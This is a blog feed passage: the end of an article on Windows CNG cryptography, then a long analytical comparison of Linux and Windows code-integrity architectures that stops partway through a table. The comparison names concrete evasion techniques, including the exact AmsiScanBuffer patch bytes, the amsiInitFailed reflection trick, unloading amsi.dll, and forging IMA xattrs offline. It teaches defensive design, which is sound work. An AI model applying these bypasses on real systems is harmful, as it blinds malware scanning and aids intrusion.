Treat FIPS mode as a deployment fact, not a development toggle. Code that works fine on a developer workstation can break in surprising ways on a FIPS-enabled production server. Run your CI on a FIPS-toggled image periodically. Catch the STATUS_NOT_SUPPORTED returns before customers do.

Watch the PQC roadmap. The ML-KEM and ML-DSA primitives are in 24H2. Hybrid TLS in Schannel is not on by default at the OS level as of mid-2026 (the most recent Microsoft public posture in the cipher-suite documentation does not yet list a default-on hybrid group), but downstream protocol updates will come. Code that uses the BCrypt and NCrypt patterns shown here picks up the new algorithms with a string change.

Note: The single most useful CNG diagnostic command on a modern Windows system is certutil -csptest, which enumerates registered providers and the algorithms each one claims to support. Run it before you suspect a configuration drift, not after.

The story of CNG is the story of two architectural bets that paid off. The first bet was that algorithms would keep arriving, so the API should be a registry of strings rather than a hard-coded set of functions. The second bet was that key storage was a separate concern from algorithm implementation, so the same primitives could run against software, TPM, smart cards, and HSMs without changing the application. In 2007 those bets looked over-engineered. In 2026, with ML-KEM shipping behind the same BCryptEncapsulate call that an ECDH consumer would have used, they look like exactly the right design.

Frequently asked questions

No. Microsoft's BCrypt is the `bcrypt.h` primitives header in CNG, providing AES, SHA, HMAC, RNG, and related primitives. The Provos-Mazieres bcrypt is a password-hashing function based on the Blowfish cipher, with no connection to Windows. The naming collision is unfortunate but firmly entrenched. When in doubt, BCrypt with a capital "B" usually means Microsoft's CNG header; lowercase bcrypt usually means the password-hashing function. On Windows, yes. .NET's `System.Security.Cryptography` namespace wraps CNG directly: `RSACng`, `ECDsaCng`, `AesGcm`, `SHA256.HashData()`, `CngKey`. Go, Rust, and Python bindings exist as third-party crates and packages (the Rust `windows` crate exposes both BCrypt and NCrypt, for example). OpenSSL on Windows does not transparently use CNG; you need the `openssl-cng` provider or direct CNG calls if you want the OS-validated primitives to do the work. Both can do RSA, ECDSA, and (in 24H2) ML-DSA signatures. The difference is lifetime. BCrypt key handles are ephemeral: they live in your process and disappear when it exits. NCrypt keys are persisted in a KSP and survive process exit, reboots, and (for AD-replicated descriptors via DPAPI-NG) the loss of a single machine. Use BCrypt for one-shot ephemeral operations (signing a single message, deriving a session key); use NCrypt for anything with a certificate attached or anything that has to be around tomorrow. Possibly, depending on what algorithms it calls. Setting `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\FIPSAlgorithmPolicy\Enabled = 1` causes CNG to refuse RC4, MD5, SHA-1 for new signatures, and a handful of other non-approved algorithms. Anything that relied on those returns `STATUS_NOT_SUPPORTED`. The fix is to switch to approved algorithms (AES, SHA-2 family, RSA, ECDSA, ML-KEM, ML-DSA), not to disable the toggle. The toggle is also necessary but not sufficient for FIPS compliance: you also need a Windows build with an active CMVP certificate covering the cryptographic modules. As of mid-2026, the public Schannel documentation does not list a default-on hybrid group like `X25519MLKEM768`. The ML-KEM primitive is in CNG in 24H2, and Schannel can use it through the standard cipher-suite negotiation, but Microsoft has not publicly committed to enabling a hybrid group out of the box at the OS level. Chrome, Cloudflare, and AWS have already shipped hybrid PQ TLS in production at the application layer. Expect Schannel to follow once IETF standardization stabilizes and CMVP validation of the new modules catches up. For a certificate in the user or machine store, run `certutil -store -v My` (or `My` replaced with the store name) and look at the "Provider" field of each certificate. `Microsoft Software Key Storage Provider` means the key is on disk under `%APPDATA%` or `%ALLUSERSPROFILE%`. `Microsoft Platform Crypto Provider` means the key lives inside the TPM (or Pluton). `Microsoft Smart Card Key Storage Provider` means the key is on a card. Third-party HSM KSPs will show the vendor's provider name. For a freshly-created key via `NCryptCreatePersistedKey`, the provider name you passed to `NCryptOpenStorageProvider` is the source of truth. Because private keys do not live in the calling process. For the Microsoft Software KSP, key material lives in the LSA key-isolation process (`lsaiso.exe` under VBS, `lsass.exe` otherwise), and every operation that touches private bits has to cross that process boundary. The cost is around 30 to 100 microseconds per call. That is acceptable for signing or key derivation (operations that happen a handful of times per session); it would be punishing for bulk symmetric encryption. The architectural answer is to keep bulk crypto in BCrypt and let only the persistent-key operations pay the LRPC cost.

<StudyGuide slug="cng-architecture-bcrypt-ncrypt-ksps-and-windows-crypto" keyTerms={[ { term: "CAPI (Cryptographic Application Programming Interface)", definition: "The original Windows cryptographic API (1998-onward). Plug-in unit was the CSP. Superseded by CNG starting in 2007 but still present for backwards compatibility." }, { term: "CNG (Cryptography API: Next Generation)", definition: "The Windows cryptographic API since Vista (2007). Two-tier split: BCrypt for primitives, NCrypt for key storage. The basis for all modern Windows cryptography." }, { term: "CSP (Cryptographic Service Provider)", definition: "The CAPI-era plug-in unit. Monolithic DLL bundling algorithms, key storage, and FIPS posture." }, { term: "KSP (Key Storage Provider)", definition: "The CNG-era plug-in unit for persistent key storage. Microsoft ships four; third parties ship many more. Selected by name string passed to NCryptOpenStorageProvider." }, { term: "Microsoft Software Key Storage Provider", definition: "The default KSP. Stores DPAPI-wrapped keys on disk and dispatches operations through the LSA key-isolation process via LRPC." }, { term: "Microsoft Platform Crypto Provider", definition: "The TPM-and-Pluton-backed KSP. Keys are generated and used inside the TPM chip; private bits never leave the silicon." }, { term: "TPM key attestation", definition: "A three-key chain (EK -> AIK -> application key) that lets a CA verify a key was generated inside a real TPM. Supported by Active Directory Certificate Services since Windows Server 2012 R2." }, { term: "FIPS 140", definition: "US federal certification program for cryptographic modules. Validated modules receive a public CMVP certificate. Windows 11's bcryptprimitives.dll holds CMVP certificate #4825, cng.sys holds #4766." }, { term: "ML-KEM (FIPS 203)", definition: "Module-Lattice Key Encapsulation Mechanism. The NIST-standardized post-quantum KEM, formerly known as CRYSTALS-Kyber. Shipped in Windows 11 24H2." }, { term: "ML-DSA (FIPS 204)", definition: "Module-Lattice Digital Signature Algorithm. The NIST-standardized post-quantum signature scheme, formerly known as CRYSTALS-Dilithium. Shipped in Windows 11 24H2." }, { term: "DPAPI-NG", definition: "The CNG-era rebuild of the original Data Protection API. Uses NCrypt protection descriptors to bind protected data to AD principals (users, groups, web credentials) rather than to a single machine." }, { term: "SymCrypt", definition: "Microsoft's open-source cryptographic implementation library. The actual workhorse behind BCrypt and NCrypt since Windows 10 version 1703 (2017)." } ]} />

Two Routes to Code Integrity: Linux IMA + AppArmor vs Windows WDAC + AMSI

noreply@paragmali.com (Parag Mali) — Sat, 16 May 2026 00:00:00 GMT

Linux and Windows have spent fifteen years answering the same question -- "is this code allowed to run?" -- and arrived at radically different architectures. Linux composes half a dozen narrow kernel modules (IMA, EVM, AppArmor, SELinux, fs-verity, IPE) plus a userspace daemon (`fapolicyd`); Windows ships one integrated suite (App Control + HVCI + AMSI + Smart App Control). Both stacks shipped their v1 with the **check in the wrong place**, and the architectural pivots that fixed it -- EVM's HMAC-sealed xattrs, HVCI's hypervisor-isolated verifier, IPE's property-based decisions -- are the breakthrough lesson of this comparison. Crypto is solved. Trust-boundary protection and policy expressiveness are not, and Rice's theorem says they never fully will be.

1. Two bypasses, same architectural shape

On a Windows 11 desktop, an attacker with a PowerShell session under their control can blind Microsoft Defender to every script that session ever evaluates by overwriting six bytes inside one function in amsi.dll. The Antimalware Scan Interface, the in-process bridge between scripting hosts and the registered antivirus product, dutifully reports "clean" on every subsequent buffer because the prologue of AmsiScanBuffer has been patched to mov eax, 0; ret (B8 00 00 00 00 C3).

The interface ships exactly as Microsoft documents it, and the function still has the signature in MSDN [@learn-microsoft-com-amsi-amsiscanbuffer]: the attacker did not need to break anything. They needed only to write into the address space they already owned.

On a Linux server, a different attacker with offline access to the disk -- recovered from a stolen laptop, a forensics image, a hostile cloud-provider snapshot -- mounts the filesystem and rewrites a system binary together with the file's security.ima extended attribute. When the box boots, the kernel's Integrity Measurement Architecture hashes the binary at exec time, compares the hash to the value stored in security.ima, sees a match, and allows execution. Without the Extended Verification Module, IMA appraisal has no defence against this offline-rewrite attack [@lwn-net-articles-394170] -- the reference hash is sitting next to the file the attacker just replaced.

Both operating systems claim fail-closed code-integrity enforcement. Both lose to a single architectural mistake about where the check runs. The mistakes are different in detail and identical in shape: the verifier is reachable by the attacker. On Windows the attacker shares the script host's address space with the scanner. On Linux the attacker shares the on-disk container with the reference hash.

This article exists to make that symmetry visible. The two stacks reached their 2026 form by very different routes -- Linux composes six narrow Linux Security Modules and one userspace daemon, Windows ships one tightly-coupled product line -- but the breakthroughs on each side answered the same question: how do you move the verifier out of reach?

The Linux answer was EVM (HMAC the extended attributes that IMA depends on) and IPE (decide on immutable file properties rather than file contents). The Windows answer was HVCI (lift the kernel-mode code-integrity check into a hypervisor-isolated secure kernel). The names are different. The lesson is one.

Why did Linux and Windows arrive at such different architectures in the first place? That story starts in an IBM research lab in 2003.

2. The question both operating systems are trying to answer

Both lineages exist to answer one question -- "is this code allowed to run?" -- but they put the check in completely different places. Before we can compare them honestly, we need a shared vocabulary for the three layers any production code-integrity stack must cover.

The first layer is code integrity itself, often abbreviated CI: a gate on the file's content or its signer. Did this .so come from a package my distribution signed? Does this .exe match an Authenticode chain rooted in a publisher my policy trusts? The answer is binary. The hook fires before the process loads the bytes.

The second layer is mandatory access control, or MAC. Now the process is running. What can it do? Can nginx open /etc/shadow? Can mshta.exe spawn cmd.exe? MAC is enforced by the kernel above discretionary access control and cannot be overridden by userspace privileges.

A kernel-enforced policy layer above traditional discretionary access control (DAC). Unlike DAC, where the file owner sets permissions, MAC policy is set by the system administrator and applied uniformly to all processes; no user, including root, can override it without changing the policy itself.

The third layer is content inspection: gating not on the file but on the buffer the interpreter is about to evaluate. The PowerShell engine has just deobfuscated a long string into a script block. Is the script block malicious? Linux has no production equivalent. Windows ships AMSI [@learn-microsoft-com-interface-portal] for exactly this.

Where each operating system puts these checks tells you almost everything about its architectural philosophy.

Linux puts every check on a Linux Security Module hook [@kernel-org-security-lsmhtml]. IMA registers at bprm_check (the kernel hook that fires when a binary is about to be executed), file_mmap with MAY_EXEC, module_check, firmware_check, and kexec_*. AppArmor and SELinux register at the syscall-level access hooks. fapolicyd rides on top of fanotify. IPE hooks op=EXECUTE. The kernel is the trust boundary, and every mechanism is a polite tenant inside it.

The kernel framework, merged into Linux 2.6.0 in December 2003, that hosts pluggable security modules at well-defined hook points in the kernel. LSMs include SELinux, AppArmor, Smack, Tomoyo, IMA, EVM, IPE, BPF LSM, and Landlock; multiple modules can coexist via "LSM stacking".

Windows takes the opposite path. The PE loader is the gate for user-mode code integrity (UMCI). The kernel-mode code-integrity check is, in the modern stack, moved out of the normal kernel into a small secure kernel running on top of Hyper-V -- Hypervisor-protected Code Integrity, HVCI [@learn-microsoft-com-code-integrity]. The script broker runs in-process with each scripting host. Cloud reputation is consulted via the Intelligent Security Graph and exposed to consumers as Smart App Control.

A monotonically extendable hash register inside a Trusted Platform Module. New measurements are folded in with `PCR_new = SHA256(PCR_old || measurement)`. Once extended, the value cannot be rolled back without resetting the TPM. IMA extends file-content hashes into PCR 10; the Windows Measured Boot chain uses PCRs 0-7 and 11-14.

The architectural philosophy comes down to a sentence each. Linux trusts the kernel surface and packs every integrity mechanism into it as a separate LSM. Windows trusts a hypervisor-isolated secure kernel and uses it to host the integrity logic the normal kernel cannot be trusted to run honestly.

flowchart LR subgraph CI[Code integrity: gate on file content or signer] direction TB L_IMA[Linux: IMA + EVM] L_IPE[Linux: IPE] L_FSV[Linux: fs-verity] L_FAP[Linux: fapolicyd] W_WDAC[Windows: App Control / WDAC] W_HVCI[Windows: HVCI / Memory Integrity] W_SAC[Windows: Smart App Control] end subgraph MAC[Mandatory access control: gate on running process behaviour] direction TB L_AA[Linux: AppArmor] L_SE[Linux: SELinux] W_NONE[Windows: no direct analogue, closest is AppContainer / ASR] end subgraph CS[Content inspection: gate on the buffer the interpreter will evaluate] direction TB W_AMSI[Windows: AMSI] L_GAP[Linux: no production equivalent] end CI --> MAC --> CS

Neither stack started this way. The 2026 stack on each side is the accumulated answer to fifteen years of failures. Here is how they grew up.

3. Two genesis stories

In 2003, four IBM researchers at the T. J. Watson Research Center -- Reiner Sailer, Xiaolan Zhang, Trent Jaeger, and Leendert van Doorn -- tried to convince the USENIX Security community that you could prove the integrity of a Linux web server to a remote verifier. Their paper, Design and Implementation of a TCG-based Integrity Measurement Architecture [@usenix-org-tech-sailerhtml], shipped at the 13th USENIX Security Symposium in 2004. It proposed hashing every executable file at load time, extending each hash into a TPM platform configuration register, and sending the resulting measurement list to a remote verifier who could compare it to a known-good manifest.

The performance evaluation [@usenix-org-sailerhtml-node19html] measured the cost on an IBM Netvista with a 2.4 GHz Pentium 4: the file_mmap LSM hook added 0.08 microseconds per call on a cache hit, and SHA-1 fingerprinting ran at roughly 80 MB/s. The headline claim was that more than 99.9% of measure calls landed on the cached path, so the overhead was essentially free.Pentium 4-era SHA-1 at 80 MB/s vs Ice Lake-era SHA-NI-accelerated SHA-256 at roughly 2 GB/s per core: a 25x throughput jump in twenty years. The original paper's qualitative finding -- cache hit dominates, overhead is negligible -- holds even more strongly on modern silicon.

It took five years for that proposal to reach the kernel. IMA's measurement-only mode was merged in Linux 2.6.30 in June 2009. It hashed files at bprm_check, file_mmap, and module_check, extended TPM PCR 10, and otherwise let everything run.

The "is this hash allowed?" question would have to wait three more years. The Extended Verification Module landed in Linux 3.2 in January 2012; digital-signature mode for EVM followed in 3.3 in March 2012; and IMA-appraise, the enforcement extension that finally let the kernel return -EPERM when a file's hash did not match security.ima, merged in Linux 3.7 in December 2012 [@lwn-net-articles-488906]. The same LWN article frames the cadence plainly: "Much of IMA was added to the kernel in 2.6.30, but another piece, the extended verification module (EVM) was not merged until 3.2 ... Digital signature support was added to EVM in 3.3, and IMA appraisal is currently under review." Mimi Zohar's appraisal patchset [@lwn-net-articles-487700] is the canonical lore.kernel.org artifact of that final step.

AppArmor took a different, longer road. It was born inside Immunix in 1998 under the name "SubDomain", a path-based confinement layer designed to stop privilege-escalation exploits from doing anything the binary's profile did not name. Novell acquired Immunix in 2005, renamed SubDomain to AppArmor, and shipped it as the default mandatory access control layer on SLES and openSUSE. According to the Ubuntu AppArmor wiki [@wiki-ubuntu-com-apparmor], "AppArmor support was first introduced in Ubuntu 7.04, and is turned on by default in Ubuntu 7.10 and later" -- so by October 2007 AppArmor was already a default-on production MAC on the most-deployed Linux desktop distribution.

Mainlining did not happen until October 2010, when AppArmor finally landed in Linux 2.6.36 [@docs-kernel-org-lsm-apparmorhtml]. Seven years out of tree, three years default-on in Ubuntu, before the kernel community accepted it.

The contrast with SELinux [@en-wikipedia-org-security-enhancedlinux] is sharp. SELinux merged into Linux 2.6.0 in December 2003 -- barely a year after the LSM framework was created. SELinux was, in fact, the reason the LSM framework existed.

SELinux's type-enforcement model maps directly to LSM's "label the subject, label the object, look up the rule" hook signature. AppArmor's path-based reasoning does not. LSM hooks see inodes, not paths -- and an inode can be reached from many paths (bind mounts, hard links, namespace games, chroots). To merge, AppArmor had to push kernel-side helpers like `vfs_path_lookup` and `d_absolute_path` upstream so it could reconstruct the absolute path of the object at hook time. The conceptual fight took three rejected merge attempts and seven years. The lesson is one Linux kernel reviewers have repeated since: a security model is not just an algorithm, it is a commitment to a particular kind of name-resolution semantics.

The Windows lineage starts in a different building entirely. AppLocker shipped with Windows 7 and Windows Server 2008 R2 in 2009: a user-mode-only allowlist, with no hypervisor or kernel-mode backing, and rules tied to file paths, publishers, or hashes. AppLocker is still supported on modern Windows but "isn't getting new feature improvements" [@learn-microsoft-com-applocker-overview]; the modern successor is App Control for Business.

Windows 10 RTM (version 1507, July 2015) shipped the first version of Device Guard along with AMSI [@learn-microsoft-com-interface-portal] and PowerShell 5.0, which integrated with AMSI from day one. Device Guard became known as Windows Defender Application Control (WDAC) and then, in 2024, was renamed once more to App Control for Business. User-mode code integrity (UMCI) became a policy option, FilePath rules were added in Windows 10 version 1903 [@learn-microsoft-com-applocker-overview], multiple-policy authoring landed in the same release, and Smart App Control made its consumer debut in Windows 11 22H2 in September 2022 [@blogs-windows-com-2022-update].

gantt title Linux and Windows code-integrity timeline dateFormat YYYY-MM axisFormat %Y section Linux SELinux mainline 2.6.0 :2003-12, 12M AppArmor at Immunix :1998-01, 84M AppArmor default in Ubuntu :2007-10, 36M IMA mainline 2.6.30 :2009-06, 32M EVM mainline 3.2 :2012-01, 2M EVM digital sigs 3.3 :2012-03, 9M IMA-appraise 3.7 :2012-12, 24M AppArmor mainline 2.6.36 :2010-10, 14M fs-verity 5.4 :2019-11, 60M IPE 6.12 :2024-11, 12M section Windows AppLocker (Win 7) :2009-10, 70M Device Guard + AMSI + PowerShell 5 (1507) :2015-07, 25M WDAC UMCI (1709) :2017-10, 18M FilePath rules + multi-policy (1903) :2019-05, 24M HVCI broadens (Win 10 1607+) :2016-08, 60M Smart App Control (Win 11 22H2) :2022-09, 24M App Control for Business rename :2024-01, 12M

Two timelines, two design philosophies, both shipping their v1 with the same kind of mistake. The next section makes that concrete.

4. Where the naive approach breaks

Both stacks shipped their first version with the check in the wrong place. Two stories make this concrete; two more refine it.

Story A: IMA-as-shipped (2009) without EVM

When IMA reached the kernel in Linux 2.6.30, it hashed the file at bprm_check and stored the reference hash in the file's security.ima extended attribute. That is what an attacker with offline disk access needs to defeat the check, and exactly nothing else. Mount the filesystem from another box, swap the binary for a malicious one, recompute the SHA over the new binary, write the new value into security.ima. Boot the box. The kernel hashes the malicious binary at exec, reads the matching xattr the attacker just wrote, and lets the syscall through.

This is the offline-tampering attacker model EVM was designed to defeat. The contemporaneous LWN coverage put it plainly: "IMA can be subverted by 'offline' attacks, where file data or metadata is changed out from under IMA. Mimi Zohar has proposed the extended verification module (EVM) patch set as a means to protect against these offline attacks." [@lwn-net-articles-394170]

The EVM v5 patchset [@lwn-net-articles-443038], posted by Zohar in May 2011, describes the design directly: "Extended Verification Module (EVM) detects offline tampering of the security extended attributes (e.g. security.selinux, security.SMACK64, security.ima) ... initial method maintains an HMAC-sha1 across a set of security extended attributes, storing the HMAC as the extended attribute 'security.evm'."

Story B: AMSI as shipped (2015) inside the script host

AMSI's design is documented in How AMSI helps you defend against malware [@learn-microsoft-com-amsi-helps]: "Script (malicious or otherwise), might go through several passes of de-obfuscation. But you ultimately need to supply the scripting engine with plain, un-obfuscated code. And that's the point at which you invoke the AMSI APIs."

A scripting host -- PowerShell, WSH, MSHTA, Office VBA, the UAC installer dialog -- calls AmsiInitialize, then for every plain-text script buffer it is about to execute calls AmsiScanBuffer [@learn-microsoft-com-amsi-amsiscanbuffer] or AmsiScanString. The call is routed through amsi.dll, loaded into the host process, which dispatches to the registered IAntimalwareProvider COM server. Defender is the default provider.

The detection logic is sound. The trust boundary is not. The attacker already controls the script host. Three single-shot bypass techniques have lived in red-team toolkits since 2016:

Patch AmsiScanBuffer's prologue in memory to mov eax, 0; ret (B8 00 00 00 00 C3). Six bytes of opcode rewrite, no syscalls required, blinds the scanner permanently for this process.
Set System.Management.Automation.AmsiUtils.amsiInitFailed = true via reflection. PowerShell checks the flag on every scan path and short-circuits.
Unload amsi.dll via FreeLibrary. There is no scanner left to call.

Microsoft tracks this so closely that its own "Applications that can bypass App Control" [@learn-microsoft-com-bypass-appcontrol] deny list calls out the AMSI-bypass-capable versions of system.management.automation.dll by hash. The defender's authoritative list of files-to-block treats specific signed Microsoft DLLs as named threats.The same Microsoft bypass list also enumerates mshta.exe, wscript.exe, cscript.exe, msbuild.exe, Microsoft.Build.dll, windbg.exe, cdb.exe, kd.exe, dotnet.exe, csi.exe, rcsi.exe, addinprocess.exe, wmic.exe, bash.exe, wsl.exe, runscripthelper.exe, and dozens of others -- 40+ entries today, growing whenever a new Microsoft-signed binary turns out to host an attacker-friendly evaluator.

Note: The host process making the AMSI call is the same process the attacker is running in. Any defence-in-depth plan that treats AMSI as a hard control is mis-specified. Treat AMSI as a high-quality telemetry surface feeding Defender for Endpoint and EDR pipelines; budget for the bypass.

{` // In Windows, AMSI scans each plain-text script buffer just before // the scripting engine evaluates it. The scanner lives in amsi.dll, // loaded into the script host process. The attacker who controls // that process can rewrite the function's first few bytes. // // This toy model shows the consequence: once "patched", the scanner // returns CLEAN regardless of input, and the assertion below holds // for every possible payload.

const AMSI_RESULT_CLEAN = 0; const AMSI_RESULT_MALWARE = 32768;

function amsiScanBuffer(buf, patched) { if (patched) return AMSI_RESULT_CLEAN; if (buf.includes("Invoke-Mimikatz")) return AMSI_RESULT_MALWARE; return AMSI_RESULT_CLEAN; }

console.log("Normal mode:"); console.log(" clean payload: ", amsiScanBuffer("Get-Process", false)); console.log(" malicious payload:", amsiScanBuffer("Invoke-Mimikatz", false));

console.log("\nAfter six-byte patch:"); console.log(" clean payload: ", amsiScanBuffer("Get-Process", true)); console.log(" malicious payload:", amsiScanBuffer("Invoke-Mimikatz", true));

// The takeaway: no input ever produces MALWARE once the scanner is patched. // Strengthening AMSI's signature engine cannot fix this. The scanner // must move out of the script host's address space. `}

Story C: WDAC's "trust all Microsoft-signed code" anti-pattern

A WDAC policy that trusts code signed by Microsoft also trusts every binary Microsoft has ever signed. That set includes mshta.exe, wscript.exe, cscript.exe, msbuild.exe, wmic.exe, system.management.automation.dll, and the 40-plus other binaries enumerated on Microsoft's own App Control bypass list [@learn-microsoft-com-bypass-appcontrol]. The LOLBAS community catalogue [@lolbas-project-github-io] widens the field to roughly 200 living-off-the-land binaries with explicit MITRE ATT&CK technique mappings.

The pattern is structural: WDAC grants trust at signer granularity (a chain rooted at "Microsoft Corporation"); attackers exploit at binary granularity (the specific mshta.exe that will happily evaluate an HTA blob containing a PowerShell stager). Any non-trivial WDAC policy must therefore contain explicit hash-level denies for the known-bad versions, and must keep growing those denies as Microsoft ships new signed binaries.

Story D: fapolicyd's permissive-window failure

fapolicyd [@access-redhat-com-fapolicydsecurity-hardening] is the Red Hat userspace allowlister. It sits on the fanotify permission channel and answers "may this open or exec proceed?" against a compiled rule database. It does not have IMA's offline-tampering problem because trust is inherited from the RPM database: "An application is trusted when the system package manager correctly installs it and therefore registered in the system RPM database. The fapolicyd daemon uses the RPM database as a list of trusted binaries and scripts."

What it does have is an operational footgun. Setting permissive=1 "just for troubleshooting" silently disables enforcement. Terminating the daemon causes the kernel to fail open after the fanotify response timeout. The architectural choice -- userspace daemon over kernel-mode hook -- is what makes both failure modes possible.

Key idea: The check was strong. The boundary protecting the check was weak. On IMA-as-shipped the reference hash sat next to the file the attacker rewrote. On AMSI the scanner sat inside the process the attacker controlled. On WDAC the trust grant was wider than the exploitation unit. On fapolicyd the verifier was a userspace process that could be terminated. Four different stacks, four different boundary failures, one identical lesson.

Bypass class	Stack	Concrete example	Root cause
Offline metadata swap	IMA without EVM	Rewrite binary and matching `security.ima` xattr from rescue media	Reference value stored next to the file under attacker control
In-process scanner patch	AMSI in PowerShell	`mov eax, AMSI_RESULT_CLEAN; ret` over `AmsiScanBuffer` prologue	Scanner shares address space with the script host the attacker runs in
Signer-vs-binary mismatch	WDAC Publisher rules	Allow Microsoft-signed code, attacker runs `mshta.exe`	Trust grant is coarser than the exploitable unit
Daemon liveness	fapolicyd	Terminate `fapolicyd` or set `permissive=1`	Verifier is a userspace process with no kernel-rooted backstop

Each of these failures has the same shape: the check was strong, the boundary protecting the check was weak. Both operating systems noticed, and fixed it in 2012 and 2016 in very different ways. Both fixes followed the same principle.

5. The architectural pivots

Both lineages reached the same conclusion at the same time: strengthen the boundary, not the check. Each pivot moved the trust boundary outward, beyond the place the attacker could reach.

EVM (Linux 3.2, January 2012): the xattrs become non-forgeable

The Extended Verification Module computes an HMAC over the security-relevant extended attributes -- security.ima, security.selinux, security.SMACK64, security.apparmor, security.capability -- plus inode metadata (UID, GID, mode, generation), and stores the result in security.evm. The HMAC key is loaded into the kernel keyring at boot, ideally sealed to a TPM 2.0 PCR set so the key is not retrievable except on a machine whose boot state matches the sealing measurement. The kernel keyring documentation for trusted and encrypted keys [@kernel-org-trusted-encryptedhtml] describes the substrate.

An offline attacker with disk access still cannot forge security.evm without the HMAC key. Digital-signature mode (EVM portable signatures, Linux 3.3) gives the same guarantee without any on-box key material. The check did not get cryptographically stronger: HMAC-SHA256 was not new in 2012. What changed was that the reference value the check consults moved from "an xattr next to the file" to "an xattr whose integrity is bound to a key the attacker does not have". Red Hat documents the modern setup in Enhancing security with the kernel integrity subsystem [@access-redhat-com-subsystemsecurity-hardening].

The Linux integrity module that protects the security-relevant extended attributes IMA depends on. EVM computes an HMAC (or digital signature) over the xattr set plus inode metadata and stores it in `security.evm`. Without the EVM key, an offline attacker cannot rewrite a binary and its matching `security.ima` to produce a valid pair. sequenceDiagram participant App as User app participant K as Kernel participant FS as Filesystem participant IMA as IMA participant EVM as EVM participant TPM as TPM keyring App->>K: execve("/usr/bin/foo") K->>IMA: bprm_check hook IMA->>FS: read file bytes IMA->>IMA: compute SHA-256 IMA->>FS: read security.ima xattr IMA->>EVM: verify xattr integrity EVM->>FS: read security.evm and full xattr set EVM->>TPM: HMAC key from keyring (sealed to PCRs) EVM->>EVM: recompute HMAC over xattr set + inode meta alt HMAC matches and IMA hash matches EVM-->>IMA: ok IMA-->>K: allow K-->>App: exec proceeds else mismatch EVM-->>IMA: -EPERM IMA-->>K: deny K-->>App: -EPERM end

IMA-appraise (Linux 3.7, December 2012): from observation to enforcement

The merge cadence on the kernel side is itself part of the story. Measurement-only IMA shipped in 2.6.30 in 2009. EVM merged in 3.2 in January 2012. EVM digital signatures merged in 3.3 in March 2012. IMA-appraise, which finally lets the kernel return -EPERM on a hash mismatch, merged in Linux 3.7 in December 2012 [@lwn-net-articles-488906]. Three and a half years from "we hash files" to "we refuse to run files that fail the hash". The gap was not engineering laziness; it was the time it took to design and merge the boundary-strengthening pieces that made enforcement safe to enable.

HVCI / Memory Integrity (Windows 10 1607, August 2016): the secure kernel

Windows took the equivalent step four years later, but at a different layer. Virtualization-Based Security (VBS) [@learn-microsoft-com-oem-vbs] splits Windows into Virtual Trust Level 0 -- the normal kernel everyone has been writing rootkits for since 1993 -- and Virtual Trust Level 1, a small secure kernel hosted by Hyper-V. The kernel-mode Code Integrity check that gates loading of every driver is moved into VTL1. A VTL0 attacker with full SYSTEM, even one who has loaded a malicious driver, cannot patch the VTL1 verifier; they cannot even read its memory.

Windows' Hyper-V-rooted split that puts a small secure kernel in VTL1, isolated from the normal Windows kernel (VTL0) by the hypervisor. Hypervisor-protected Code Integrity (HVCI), exposed in Windows Settings as "Memory integrity", uses VTL1 to host the kernel-mode code-integrity check, so a VTL0 attacker with SYSTEM cannot patch the verifier or downgrade its policy.

Microsoft's HVCI documentation [@learn-microsoft-com-oem-vbs] frames the W^X invariant HVCI enforces on kernel pages: "memory integrity ... protects and hardens Windows by running kernel mode code integrity within the isolated virtual environment of VBS ... ensuring that kernel memory pages are only made executable after passing code integrity checks inside the secure runtime environment, and executable pages themselves are never writable." A kernel page can be writable or executable; never both at the same time. The split is enforced by the hypervisor."HVCI", "Memory Integrity", and "kernel-mode code integrity running in VBS" are the same mechanism. Microsoft's product-name churn here is unusually thick: the Windows Settings UI calls it Memory Integrity, the documentation page is titled "Enable virtualization-based protection of code integrity", the underlying capability is HVCI, and Microsoft also markets the same hardware-and-software bundle as "Secured-Core PC".

flowchart TD subgraph VTL0[VTL0: normal Windows kernel] P[User process] DRV[Driver load request] RK[Hypothetical rootkit with SYSTEM] K0[NT kernel] P --> K0 DRV --> K0 RK --> K0 end K0 -->|hypercall: verify driver| HV[Hypervisor] RK -.X.-> SK HV --> SK subgraph VTL1[VTL1: secure kernel] SK[Secure kernel] CI[Kernel-mode CI verifier] SK --> CI end CI -->|allow / deny| HV HV -->|result| K0

IPE (Linux 6.12, November 2024): property-based decisions

The most recent Linux pivot moves further still. Integrity Policy Enforcement [@docs-kernel-org-lsm-ipehtml], upstreamed in Linux 6.12 in November 2024 from a Microsoft-contributed patch series (source on GitHub [@github-com-microsoft-ipe]), does not hash files at all. Its kernel documentation is explicit: "Integrity Policy Enforcement (IPE) is a Linux Security Module that takes a complementary approach to access control. Unlike traditional access control mechanisms that rely on labels and paths for decision-making, IPE focuses on the immutable security properties inherent to system components." A policy rule looks like:

op=EXECUTE dmverity_signature=TRUE dmverity_roothash=sha256:<hex> action=ALLOW
op=EXECUTE fsverity_signature=TRUE action=ALLOW
op=EXECUTE action=DENY

The kernel is not asked "what is the SHA-256 of this file?" at op=EXECUTE time. It is asked "did this file come from a dm-verity device whose root hash matches one of our trusted signatures?" The verifier has nothing to compute per access; it has only to read a pre-computed property. The trust boundary has moved out to whoever signed the dm-verity image at build time.

fs-verity (Linux 5.4, November 2019): O(log n) per page

The cryptographic complement is fs-verity [@kernel-org-filesystems-fsverityhtml], upstreamed in Linux 5.4 in November 2019 by Eric Biggers and Theodore Ts'o at Google. The kernel docs describe the trick: "fs-verity is similar to dm-verity but works on files rather than block devices ... userspace can execute an ioctl that causes the filesystem to build a Merkle tree for the file and persist it to a filesystem-specific location ... Userspace can use another ioctl to retrieve the root hash ... in constant time, regardless of the file size."

The Merkle tree turns whole-file hashing into O(log n) verification per page read, with constant-time digest retrieval. Concretely, an APK or container layer with thousands of pages does not need a full hash on first open; the page cache verifies the leaves and intermediate Merkle nodes only for the pages actually touched. IMA can consume fs-verity's digest directly through the digest_type=verity modifier in its policy language.

The breakthrough was not a stronger check. It was moving the check out of the attacker's address space.

Each pivot moved the trust boundary outward in a different direction. EVM moved the integrity root from "xattr next to the file" to "HMAC-keyed xattr, key sealed to TPM PCRs". HVCI moved the kernel-mode verifier from "in the kernel the attacker can patch" to "in a secure kernel the attacker cannot reach without breaking the hypervisor". IPE moved the per-access decision from "recompute a file's hash" to "look up a precomputed property". Fs-verity collapsed the per-access cost from O(n) on the file to O(log n) on a Merkle path.

The crypto was already strong. The breakthrough was the geometry of where the verifier lived.

By 2020 both stacks looked dramatically different from their 2009 and 2015 originals. Here is what each one looks like today, side by side.

6. The stack today, side by side

Eleven moving parts. Here is how they line up.

Linux	Windows	Layer
IMA appraise + EVM	App Control (WDAC) UMCI	User-mode code integrity
